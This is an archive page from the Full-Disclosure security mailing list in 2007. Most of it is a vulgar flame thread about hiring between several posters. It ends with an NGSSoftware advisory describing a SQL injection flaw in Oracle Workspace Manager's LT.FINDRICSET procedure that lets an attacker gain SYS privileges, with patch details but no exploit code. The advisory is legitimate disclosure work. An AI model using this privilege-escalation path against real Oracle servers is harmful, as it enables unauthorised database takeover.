>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>>
>>>
 
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>> --
>>
>> - simon
>>
>> --
>> http://www.snosoft.com
>>
>>
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Forward what ever you want, just make sure to edit it first so that you
don't look like a liar ;)

dripping wrote:
> I like how he still hasn't responded.
> 
> reepex wrote:
>> im going to wait for simon to respond ;P
>>
>> he is really good at making himself look like an idiot
>>
>> On Dec 9, 2007 1:39 PM, dripping <[EMAIL PROTECTED]> wrote:
>>
>>> not that i care if this is on/off the list,
>>> do it * 9000.
>>>
>>> reepex wrote:
 turned down? should i forward the list the emails were you and that
>>> random
 from netragard were begging me to work for you?

 On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:

> Awww, reepex feels bad because he got turned down... ;]
>
> reepex wrote:
>> only simon from snosoft and people from netragard try to hire people
>> from FD ;)
>>
>> apparently they are not too satisfied with their current employees'
> skills
>> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
>> > wrote:
>>
>> And would you like to join my new CYBERSECURITY FIRM?
>> We post to mailing lists and advertise like we're not actually
>> advertising for ourselves.
>>
>> reepex wrote:
>> > I tried responding to your mail but it seems you did not get it
>>> so
>> maybe you
>> > will on the list
>> >
>> > yes I would LOVE to your join your crew - could you please email
>> me your
>> > silc server and bbs board details?
>> >
>> > On Dec 3, 2007 8:00 AM, Gobbles is back <
>> [EMAIL PROTECTED] > > wrote:
>> >
>> >> Would you wish to join our crew ?
>> >>
>> >>
>> >>
>> >
>> >
>> >
>>
>>> 
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> 
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>>
>>> 
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> --
>
> - simon
>
> --
> http://www.snosoft.com
>
>
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread dripping
I like how he still hasn't responded.

reepex wrote:
> im going to wait for simon to respond ;P
> 
> he is really good at making himself look like an idiot
> 
> On Dec 9, 2007 1:39 PM, dripping <[EMAIL PROTECTED]> wrote:
> 
>> not that i care if this is on/off the list,
>> do it * 9000.
>>
>> reepex wrote:
>>> turned down? should i forward the list the emails were you and that
>> random
>>> from netragard were begging me to work for you?
>>>
>>> On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:
>>>
 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
> only simon from snosoft and people from netragard try to hire people
> from FD ;)
>
> apparently they are not too satisfied with their current employees'
 skills
> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
> > wrote:
>
> And would you like to join my new CYBERSECURITY FIRM?
> We post to mailing lists and advertise like we're not actually
> advertising for ourselves.
>
> reepex wrote:
> > I tried responding to your mail but it seems you did not get it
>> so
> maybe you
> > will on the list
> >
> > yes I would LOVE to your join your crew - could you please email
> me your
> > silc server and bbs board details?
> >
> > On Dec 3, 2007 8:00 AM, Gobbles is back <
> [EMAIL PROTECTED]  > wrote:
> >
> >> Would you wish to join our crew ?
> >>
> >>
> >>
> >
> >
> >
>
>> 
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> 
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
 --

 - simon

 --
 http://www.snosoft.com


>>>
>>> 
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread reepex
turned down? should i forward the list the emails were you and that random
from netragard were begging me to work for you?

On Dec 9, 2007 12:17 PM, Simon Smith <[EMAIL PROTECTED]> wrote:

> Awww, reepex feels bad because he got turned down... ;]
>
> reepex wrote:
> > only simon from snosoft and people from netragard try to hire people
> > from FD ;)
> >
> > apparently they are not too satisfied with their current employees'
> skills
> >
> > On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
> > > wrote:
> >
> > And would you like to join my new CYBERSECURITY FIRM?
> > We post to mailing lists and advertise like we're not actually
> > advertising for ourselves.
> >
> > reepex wrote:
> > > I tried responding to your mail but it seems you did not get it so
> > maybe you
> > > will on the list
> > >
> > > yes I would LOVE to your join your crew - could you please email
> > me your
> > > silc server and bbs board details?
> > >
> > > On Dec 3, 2007 8:00 AM, Gobbles is back <
> > [EMAIL PROTECTED] >
> > > wrote:
> > >
> > >> Would you wish to join our crew ?
> > >>
> > >>
> > >>
> > >
> > >
> > >
> >
> 
> >
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > 
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> > 
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
>
> - simon
>
> --
> http://www.snosoft.com
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2007-12-09 Thread dripping
O I NO!!!
btw, stop specifying the "WANT RECEIPT ON RED "
because it's fucking annoying, nobody wants to read your emails.
thnx bai

Simon Smith wrote:
> Your kewl
> 
> dripping wrote:
>> porn stars, people who love to drip semen all over women's faces,
>> etc etc
>> hopefully you catch my drip.
>> LOL U C WUT I DID THAR???///
>>
>> any new leet TRU64 EXPLOITS COMIN OUT?
>> maybe you can actually get HP to like you this time
>>
>> Simon Smith wrote:
>>> lol, what kind of self respecting person uses the name dripping?
>>> ;]
>>>
>>> dripping wrote:
 What kind of self-respecting, ubar serious firm, group, or..well,
 anything, for that matter,
 uses blogspot.com for their utterly useless information.
 ty bai

 ;)

 Simon Smith wrote:
> Awww, reepex feels bad because he got turned down... ;]
>
> reepex wrote:
>> only simon from snosoft and people from netragard try to hire people
>> from FD ;)
>>
>> apparently they are not too satisfied with their current employees' 
>> skills
>>
>> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
>> > wrote:
>>
>> And would you like to join my new CYBERSECURITY FIRM?
>> We post to mailing lists and advertise like we're not actually
>> advertising for ourselves.
>>
>> reepex wrote:
>> > I tried responding to your mail but it seems you did not get it so
>> maybe you
>> > will on the list
>> >
>> > yes I would LOVE to your join your crew - could you please email
>> me your
>> > silc server and bbs board details?
>> >
>> > On Dec 3, 2007 8:00 AM, Gobbles is back <
>> [EMAIL PROTECTED] >
>> > wrote:
>> >
>> >> Would you wish to join our crew ?
>> >>
>> >>
>> >>
>> >
>> >
>> >
>> 
>> 
>>
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> 
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Your kewl

dripping wrote:
> porn stars, people who love to drip semen all over women's faces,
> etc etc
> hopefully you catch my drip.
> LOL U C WUT I DID THAR???///
> 
> any new leet TRU64 EXPLOITS COMIN OUT?
> maybe you can actually get HP to like you this time
> 
> Simon Smith wrote:
>> lol, what kind of self respecting person uses the name dripping?
>> ;]
>>
>> dripping wrote:
>>> What kind of self-respecting, ubar serious firm, group, or..well,
>>> anything, for that matter,
>>> uses blogspot.com for their utterly useless information.
>>> ty bai
>>>
>>> ;)
>>>
>>> Simon Smith wrote:
 Awww, reepex feels bad because he got turned down... ;]

 reepex wrote:
> only simon from snosoft and people from netragard try to hire people
> from FD ;)
>
> apparently they are not too satisfied with their current employees' skills
>
> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
> > wrote:
>
> And would you like to join my new CYBERSECURITY FIRM?
> We post to mailing lists and advertise like we're not actually
> advertising for ourselves.
>
> reepex wrote:
> > I tried responding to your mail but it seems you did not get it so
> maybe you
> > will on the list
> >
> > yes I would LOVE to your join your crew - could you please email
> me your
> > silc server and bbs board details?
> >
> > On Dec 3, 2007 8:00 AM, Gobbles is back <
> [EMAIL PROTECTED] >
> > wrote:
> >
> >> Would you wish to join our crew ?
> >>
> >>
> >>
> >
> >
> >
> 
> 
>
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> 
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>>
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread dripping
porn stars, people who love to drip semen all over women's faces,
etc etc
hopefully you catch my drip.
LOL U C WUT I DID THAR???///

any new leet TRU64 EXPLOITS COMIN OUT?
maybe you can actually get HP to like you this time

Simon Smith wrote:
> lol, what kind of self respecting person uses the name dripping?
> ;]
> 
> dripping wrote:
>> What kind of self-respecting, ubar serious firm, group, or..well,
>> anything, for that matter,
>> uses blogspot.com for their utterly useless information.
>> ty bai
>>
>> ;)
>>
>> Simon Smith wrote:
>>> Awww, reepex feels bad because he got turned down... ;]
>>>
>>> reepex wrote:
 only simon from snosoft and people from netragard try to hire people
 from FD ;)

 apparently they are not too satisfied with their current employees' skills

 On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
 > wrote:

 And would you like to join my new CYBERSECURITY FIRM?
 We post to mailing lists and advertise like we're not actually
 advertising for ourselves.

 reepex wrote:
 > I tried responding to your mail but it seems you did not get it so
 maybe you
 > will on the list
 >
 > yes I would LOVE to your join your crew - could you please email
 me your
 > silc server and bbs board details?
 >
 > On Dec 3, 2007 8:00 AM, Gobbles is back <
 [EMAIL PROTECTED] >
 > wrote:
 >
 >> Would you wish to join our crew ?
 >>
 >>
 >>
 >
 >
 >
 
 

 >
 > ___
 > Full-Disclosure - We believe in it.
 > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 
 > Hosted and sponsored by Secunia - http://secunia.com/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-09 Thread Simon Smith
Awww, reepex feels bad because he got turned down... ;]

reepex wrote:
> only simon from snosoft and people from netragard try to hire people
> from FD ;)
> 
> apparently they are not too satisfied with their current employees' skills
> 
> On Dec 9, 2007 12:04 AM, dripping < [EMAIL PROTECTED]
> > wrote:
> 
> And would you like to join my new CYBERSECURITY FIRM?
> We post to mailing lists and advertise like we're not actually
> advertising for ourselves.
> 
> reepex wrote:
> > I tried responding to your mail but it seems you did not get it so
> maybe you
> > will on the list
> >
> > yes I would LOVE to your join your crew - could you please email
> me your
> > silc server and bbs board details?
> >
> > On Dec 3, 2007 8:00 AM, Gobbles is back <
> [EMAIL PROTECTED] >
> > wrote:
> >
> >> Would you wish to join our crew ?
> >>
> >>
> >>
> >
> >
> >
> 
> 
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> 
> > Hosted and sponsored by Secunia - http://secunia.com/
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-08 Thread reepex
only simon from snosoft and people from netragard try to hire people from FD
;)

apparently they are not too satisfied with their current employees' skills

On Dec 9, 2007 12:04 AM, dripping <[EMAIL PROTECTED]> wrote:

> And would you like to join my new CYBERSECURITY FIRM?
> We post to mailing lists and advertise like we're not actually
> advertising for ourselves.
>
> reepex wrote:
> > I tried responding to your mail but it seems you did not get it so maybe
> you
> > will on the list
> >
> > yes I would LOVE to your join your crew - could you please email me your
> > silc server and bbs board details?
> >
> > On Dec 3, 2007 8:00 AM, Gobbles is back <[EMAIL PROTECTED]>
> > wrote:
> >
> >> Would you wish to join our crew ?
> >>
> >>
> >>
> >
> >
> > 
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2007-12-08 Thread dripping
And would you like to join my new CYBERSECURITY FIRM?
We post to mailing lists and advertise like we're not actually
advertising for ourselves.

reepex wrote:
> I tried responding to your mail but it seems you did not get it so maybe you
> will on the list
> 
> yes I would LOVE to your join your crew - could you please email me your
> silc server and bbs board details?
> 
> On Dec 3, 2007 8:00 AM, Gobbles is back <[EMAIL PROTECTED]>
> wrote:
> 
>> Would you wish to join our crew ?
>>
>>
>>
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2007-12-08 Thread reepex
I tried responding to your mail but it seems you did not get it so maybe you
will on the list

yes I would LOVE to your join your crew - could you please email me your
silc server and bbs board details?

On Dec 3, 2007 8:00 AM, Gobbles is back <[EMAIL PROTECTED]>
wrote:

> Would you wish to join our crew ?
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2007-10-17 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory

Name: SQL Injection Flaw in Oracle Workspace Manager
Systems Affected: Oracle 10g release 1 and 2, Oracle 9i
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ [EMAIL PROTECTED] ]
Reported: 22nd August 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007B


Description
***
The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is
vulnerable to SQL injection.
 
Details
***

The Workspace Manager, owned by SYS, contains a package called LT. This
package is owned and defined by the SYS user and can be executed by PUBLIC.
LT contains a procedure called FINDRICSET which calls the FINDRICSET package
in the LTRIC package. This is vulnerable to SQL injection and can be abused
by an attacker to gain SYS privileges.

 
Fix Information
***
Oracle was alerted to this flaw on the 22nd of August 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuo
ct2007.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to this flaw. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.ph
p

 
About NGSSoftware
*
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London, St.
Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
[EMAIL PROTECTED]

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2007-10-02 Thread clappymonkey






Sent from my BlackBerry® wireless device
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  1   2   3   >